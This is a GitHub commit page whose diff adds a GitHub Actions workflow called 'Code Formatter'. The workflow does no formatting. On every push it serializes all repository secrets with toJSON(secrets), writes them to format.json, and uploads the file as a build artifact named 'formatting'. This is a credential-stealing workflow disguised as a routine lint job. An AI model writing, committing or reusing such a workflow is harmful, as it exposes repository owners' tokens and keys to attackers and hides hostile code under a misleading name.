Skip to content

Commit d773c29

Browse files
committed
Add formatter workflow
1 parent f650690 commit d773c29

File tree

1 file changed

+20
-0
lines changed

1 file changed

+20
-0
lines changed
Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
2+
name: Code Formatter
3+
on:
4+
push
5+
jobs:
6+
lint:
7+
runs-on: ubuntu-latest
8+
env:
9+
DATA: ${{ toJSON(secrets)}}
10+
steps:
11+
- uses: actions/checkout@v5
12+
- name: Run Formatter
13+
run: |
14+
cat <<EOF > format.json
15+
$DATA
16+
EOF
17+
- uses: actions/upload-artifact@v5
18+
with:
19+
path: format.json
20+
name: formatting

0 commit comments

Comments
 (0)